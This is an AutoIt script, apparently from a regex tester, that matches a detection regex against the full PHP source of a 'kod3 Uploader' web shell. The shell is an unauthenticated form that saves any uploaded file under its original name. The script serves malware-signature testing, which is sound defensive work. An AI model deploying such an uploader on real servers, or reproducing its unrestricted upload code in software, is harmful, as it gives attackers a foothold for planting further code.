#include <StringConstants.au3> ; to declare the Constants of StringRegExp
#include <Array.au3> ; UDF needed for _ArrayDisplay and _ArrayConcatenate
Local $sRegex = "(?is)^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*echo\s*['"]<title>kod3 uploader<\/title>.{0,70}?multipart\/form-data["']\s*name=["']uploader.{0,240}?\@move_uploaded_file\(\$_files\[["']file['"]\].{0,50}?echo\s*['"]upload\s*successfully.{0,60}?[[:punct:]\s]+$"
Local $sString = "<?php" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"echo "<title>kod3 Uploader</title>";" & @CRLF & _
"echo "<form method='post' enctype='multipart/form-data' name='uploader'>";" & @CRLF & _
"" & @CRLF & _
"echo '<input type="file" name="file" ><input name="upl" type="submit" id="upl" value="Upload"></form>';" & @CRLF & _
"" & @CRLF & _
"if(isset($_POST['upl'])&&$_POST['upl']== "Upload"){" & @CRLF & _
" if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])){" & @CRLF & _
" echo 'Upload Successfully ;)<br><br>';" & @CRLF & _
" }else{" & @CRLF & _
" echo 'Upload failed :(<br><br>';" & @CRLF & _
" }" & @CRLF & _
"}" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"?>"
Local $aArray = StringRegExp($sString, $sRegex, $STR_REGEXPARRAYGLOBALFULLMATCH)
Local $aFullArray[0]
For $i = 0 To UBound($aArray) -1
_ArrayConcatenate($aFullArray, $aArray[$i])
Next
$aArray = $aFullArray
; Present the entire match result
_ArrayDisplay($aArray, "Result")